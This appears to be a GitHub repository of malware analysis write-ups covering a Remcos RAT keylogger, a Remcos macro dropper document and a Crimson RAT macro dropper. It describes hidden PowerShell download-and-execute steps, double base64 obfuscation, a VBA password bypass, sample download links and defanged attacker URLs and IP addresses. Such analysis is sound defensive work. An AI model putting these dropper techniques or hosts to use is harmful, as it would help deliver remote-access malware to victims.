├── pic-set2 ├── img1.png ├── img2.png ├── img3.png ├── img4.png ├── img5.png ├── img6.png └── img7.png ├── pic-set3 ├── img1.png ├── img3.png ├── img4.png ├── img5.png ├── img6.png ├── img7.png ├── img8.png ├── img9.png ├── img10.png ├── img11.png ├── img12.png ├── img13.png └── img14.png ├── pics-set1 ├── img1.png ├── img2.png ├── img3.png ├── img4.png ├── img5.png ├── img6.png ├── img7.png └── img8.png ├── README.md ├── RemcosKeylogger.MD ├── RemcosDocDropper.MD └── CrimsonMacro.md /pic-set2/img1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1d8/analyses/HEAD/pic-set2/img1.png -------------------------------------------------------------------------------- /pic-set2/img2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1d8/analyses/HEAD/pic-set2/img2.png -------------------------------------------------------------------------------- /pic-set2/img3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1d8/analyses/HEAD/pic-set2/img3.png -------------------------------------------------------------------------------- /pic-set2/img4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1d8/analyses/HEAD/pic-set2/img4.png -------------------------------------------------------------------------------- /pic-set2/img5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1d8/analyses/HEAD/pic-set2/img5.png -------------------------------------------------------------------------------- /pic-set2/img6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1d8/analyses/HEAD/pic-set2/img6.png -------------------------------------------------------------------------------- /pic-set2/img7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1d8/analyses/HEAD/pic-set2/img7.png -------------------------------------------------------------------------------- /pic-set3/img1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1d8/analyses/HEAD/pic-set3/img1.png -------------------------------------------------------------------------------- /pic-set3/img3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1d8/analyses/HEAD/pic-set3/img3.png -------------------------------------------------------------------------------- /pic-set3/img4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1d8/analyses/HEAD/pic-set3/img4.png -------------------------------------------------------------------------------- /pic-set3/img5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1d8/analyses/HEAD/pic-set3/img5.png -------------------------------------------------------------------------------- /pic-set3/img6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1d8/analyses/HEAD/pic-set3/img6.png -------------------------------------------------------------------------------- /pic-set3/img7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1d8/analyses/HEAD/pic-set3/img7.png -------------------------------------------------------------------------------- /pic-set3/img8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1d8/analyses/HEAD/pic-set3/img8.png -------------------------------------------------------------------------------- /pic-set3/img9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1d8/analyses/HEAD/pic-set3/img9.png -------------------------------------------------------------------------------- /pic-set3/img10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1d8/analyses/HEAD/pic-set3/img10.png -------------------------------------------------------------------------------- /pic-set3/img11.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1d8/analyses/HEAD/pic-set3/img11.png -------------------------------------------------------------------------------- /pic-set3/img12.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1d8/analyses/HEAD/pic-set3/img12.png -------------------------------------------------------------------------------- /pic-set3/img13.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1d8/analyses/HEAD/pic-set3/img13.png -------------------------------------------------------------------------------- /pic-set3/img14.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1d8/analyses/HEAD/pic-set3/img14.png -------------------------------------------------------------------------------- /pics-set1/img1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1d8/analyses/HEAD/pics-set1/img1.png -------------------------------------------------------------------------------- /pics-set1/img2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1d8/analyses/HEAD/pics-set1/img2.png -------------------------------------------------------------------------------- /pics-set1/img3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1d8/analyses/HEAD/pics-set1/img3.png -------------------------------------------------------------------------------- /pics-set1/img4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1d8/analyses/HEAD/pics-set1/img4.png -------------------------------------------------------------------------------- /pics-set1/img5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1d8/analyses/HEAD/pics-set1/img5.png -------------------------------------------------------------------------------- /pics-set1/img6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1d8/analyses/HEAD/pics-set1/img6.png -------------------------------------------------------------------------------- /pics-set1/img7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1d8/analyses/HEAD/pics-set1/img7.png -------------------------------------------------------------------------------- /pics-set1/img8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1d8/analyses/HEAD/pics-set1/img8.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Malware Writeups By 1d8 2 | 3 | # Sample Resources: 4 | 5 | * [Bazaar](https://bazaar.abuse.ch/browse) 6 | 7 | # Doc Analyses: 8 | 9 | * [Remcos Dropper](https://github.com/1d8/analyses/blob/master/RemcosDocDropper.MD) 10 | * [Crimson .Doc Dropper](https://github.com/1d8/analyses/blob/master/CrimsonMacro.md) 11 | 12 | # EXE Analysis 13 | 14 | * [Remcos Keylogger](https://github.com/1d8/analyses/blob/master/RemcosKeylogger.MD) 15 | -------------------------------------------------------------------------------- /RemcosKeylogger.MD: -------------------------------------------------------------------------------- 1 | # Remcos RAT Keylogger 2 | 3 | ## Overview 4 | * [sample here](https://bazaar.abuse.ch/sample/6ad868658b3f50bfde225d52382d33a6027e8344592fb6fa296b8516d9d00f4c/) 5 | 6 | * Password to zip is **infected** 7 | 8 | * First seen: June 10, 2020 9 | 10 | * Sha256 hash: 6ad868658b3f50bfde225d52382d33a6027e8344592fb6fa296b8516d9d00f4c 11 | 12 | * filetype: exe 13 | 14 | * [Strings](https://pastebin.com/raw/vr15q8rZ) 15 | 16 | 17 | # Analysis 18 | 19 | This keylogger doesn't require any special action to trigger it to run, it constantly runs in the background & logs all events created by the user. 20 | 21 | After running the .exe file, we see that it creates a directory in the %USERPROFILE%\AppData\Roaming directory named **remcos**, it is here that the logs will be stored *Ignore the name collision result, it only occurred because I ran the malware twice*: 22 | 23 | ![](/pic-set2/img1.png) 24 | 25 | A new file is also created in the remcos directory, it's named **logs.dat** : 26 | 27 | ![](/pic-set2/img2.png) 28 | 29 | ![](/pic-set2/img3.png) 30 | 31 | The keylogger itself is quite noisy, it edits the **logs.dat** file every time a new event occurs on the system (switching tasks, typing something in the keyboard, launching a new process, etc) which is likely to be less than every second if the computer is in use: 32 | 33 | ![](/pic-set2/img4.png) 34 | 35 | One thing I found interesting was that the malware appears to interact with `HKCU\Software\Buddy-6SE1KQ\` before editing the log file: 36 | 37 | ![](/pic-set2/img5.png) 38 | 39 | Here's an example of the activity that is logged: 40 | 41 | ![](/pic-set2/img6.png) 42 | 43 | If we search through the identified strings of the .exe, we can see that the capabilities of this keylogger are wider than I originally expected, it also appears to have the ability to steal browser credentials, record audio from the microphone, and turn on & off the web cam: 44 | 45 | ![](/pic-set2/img7.png) 46 | -------------------------------------------------------------------------------- /RemcosDocDropper.MD: -------------------------------------------------------------------------------- 1 | # Remcos RAT Macro Dropper Doc 2 | 3 | ## Overview 4 | 5 | * [Sample & more info](https://bazaar.abuse.ch/sample/202d979d74f0478de0fbea103e2585a84fdab5646ad19437f5e4c4ba0cda7b90/) 6 | * Password to the zip file is **infected** 7 | * First seen: May 27, 2020 8 | * url no longer up 9 | * File type: docm 10 | * Sha256 hash: 202d979d74f0478de0fbea103e2585a84fdab5646ad19437f5e4c4ba0cda7b90 11 | * url used was: hxxp://185.205.209.166/dkkp/qlyzbsuu.a12.exe & shortened via tinyurl 12 | * [Macros used](https://pastebin.com/raw/T9YNjDpD) 13 | 14 | ## Analysis 15 | 16 | Once opened, the document looks like this: 17 | 18 | ![](/pics-set1/img8.png) 19 | 20 | In my opinion, not much work was put into crafting the actual document, but who am I to judge? 21 | 22 | When you enable content, you'd get this error message: 23 | 24 | ![](/pics-set1/img1.png) 25 | 26 | This isn't a makeshift error message crafted by the attacker as a social engineering tactic (as I did [here ;) ](https://github.com/1d8/pysock)) but rather an actual error message since the file they attempt to download & execute (named **Filename.exe**) doesn't actually download. 27 | 28 | After enabling content & letting the macros run, we open Procmon's process tree & we can see that powershell is used to *attempt* to drop the main malware (ignore all the notepad.exe noise, that was all generated by me): 29 | 30 | ![](/pics-set1/img2.png) 31 | 32 | The full powershell command used by the macro is here: 33 | 34 | ![](/pics-set1/img3.png) 35 | 36 | As we can see, it executes it in a hidden window & uses the *bypass* flag in order to bypass any protections a user has set up in order to prevent execution of unauthorized scripts (I may be incorrect, but I believe this method only works if the user is running with admin level privileges). 37 | 38 | The powershell also drops the file to disk & saves it in the Temp directory as **Filename.exe** as we seen earlier & then executes it. 39 | 40 | The url used is hxxps://tinyurl.com/ybz4nnyg. Tinyurl is a url shortener which will redirect to the main website. Attempting to navigate to this tinyurl yields no response, which likely means whatever site this malware was hosted as has since been taken down. 41 | 42 | The final payload that would've been grabbed if the url was still up would be the Remcos RAT 43 | 44 | My claim of the URL no longer being up is backed by the powershell logs: 45 | 46 | ![](/pics-set1/img4.png) 47 | 48 | If you wish to receive the powershell code without actually running it the way the attackers intended, simply edit the code and delete the Shell() command & add in a variable, then print that variable in a message box: 49 | 50 | Before: 51 | 52 | ![](/pics-set1/img5.png) 53 | 54 | After: 55 | 56 | ![](/pics-set1/img6.png) 57 | 58 | Result after running: 59 | 60 | ![](/pics-set1/img7.png) 61 | 62 | *NOTE: The reason Shell is called on a variable + a function is because the command passed to Shell is base64 encoded twice & needs to be decoded twice before being ran. So the variable **asdas** contains the command after it's decoded once and then when Shell is called as Shell(sadsad(asdas, True)) is when the command is decoded the second time. Basically the function **sadsad()** is responsible for doing the base64 decoding. I hope this makes sense. Thanks for reading!* 63 | -------------------------------------------------------------------------------- /CrimsonMacro.md: -------------------------------------------------------------------------------- 1 | # Crimson RAT Sample 2 | 3 | [Download sample](https://app.any.run/tasks/206fb61a-38ac-4f84-81f6-9389ce775c16/) 4 | 5 | # Document Password Removal 6 | 7 | The document's macros are password protected but bypassing these is quite easy. The method I've used was posted on [Stackoverflow](https://stackoverflow.com/questions/272503/removing-the-password-from-a-vba-project) 8 | 9 | Simply open the document in a text editor and search for the string 'DPB' & replace it with the string 'DPx'. 10 | 11 | ![](/pic-set3/img1.png) 12 | 13 | After replacing those strings, open up the document and go to the macros tab (Developer > Visual Basic). You will likely get this popup: 14 | 15 | ![](/pic-set3/img3.png) 16 | 17 | After clicking yes, you may get this error popup as well, simply ignore it. 18 | 19 | ![](/pic-set3/img4.png) 20 | 21 | Once in the Visual Basic window, go to Tools > Project Properties > Protection & set a new password then exit out of the document & save the changes. 22 | 23 | Now when you go into the Developer > Visual Basic tab and look at the macros, you should be able to view them by inputting the new password 24 | 25 | # Macro Analysis 26 | 27 | This first subroutine (named **Con**) sets a Path variable to: `C:\Users\Username\Intel.exe` which tells us that this macro will likely be dropping a PE file named **Intel.exe** 28 | 29 | ![](/pic-set3/img5.png) 30 | 31 | The **Con** Subroutine also splits the data in **UserForm1** by the value of an exclamation point, all this means it simply splits the data by an exclamation point. This tells us that there's data in the **UserForm1** form. 32 | 33 | Viewing that form, we don't see anything at first glance: 34 | 35 | ![](/pic-set3/img6.png) 36 | 37 | But expanding the form, we see a small box & when we expand it, we see data: 38 | 39 | ![](/pic-set3/img7.png) 40 | 41 | ![](/pic-set3/img8.png) 42 | 43 | So the **Con** subroutine will be splitting this data by exclamation points meaning it will simply be removing the exclamation points 44 | 45 | ![](/pic-set3/img5.png) 46 | 47 | I am not too sure of the exact process this goes through to turn the data from the numbers into bytes but this is my best interpretation: 48 | 49 | 1. It removes the exclamation point from the data & turns it into an array 50 | 2. It loops through each element in the array 51 | 3. It turns each array element (each set of numbers) into a Byte 52 | 53 | Moving on to the next subroutine: 54 | 55 | ![](/pic-set3/img9.png) 56 | 57 | This one is pretty simple, it just adds the value `C:\Users\Username\Intel.exe` (where Username is the username of the victim) to the Path1 string & opens & writes the bytes from the last subroutine to the **Intel.exe** file 58 | 59 | And onto the last subroutine: 60 | 61 | ![](/pic-set3/img10.png) 62 | 63 | As you could've guessed by the name, this subroutine simply runs the **Intel.exe** file with a window focus of 1 which means that the Window will be seen by the victim 64 | 65 | Testing our theory that the window should be seen by the victim: 66 | 67 | ![](/pic-set3/img13.png) 68 | 69 | # Running the Macros 70 | 71 | After running the macros, I didn't see the window popup but I assume that the **Intel.exe** file had some code that hid its window. 72 | 73 | But we can see that it is indeed ran: 74 | 75 | ![](/pic-set3/img11.png) 76 | 77 | The **Intel.exe** file reaches out to **51.89.208.53:350**, it also tries to reach the same host on port 8730: 78 | 79 | ![](/pic-set3/img12.png) 80 | 81 | Attempting to view the communication with Wireshark didn't yield much: 82 | 83 | ![](/pic-set3/img14.png) 84 | 85 | # Links Used 86 | 87 | 1. [Converting ASCII to hex](https://www.asciitohex.com/) 88 | 89 | 2. [VBA Functions List](https://www.excelfunctions.net/vba-functions.html) 90 | 91 | 3. [MSDN Shell()](https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/shell-function) 92 | --------------------------------------------------------------------------------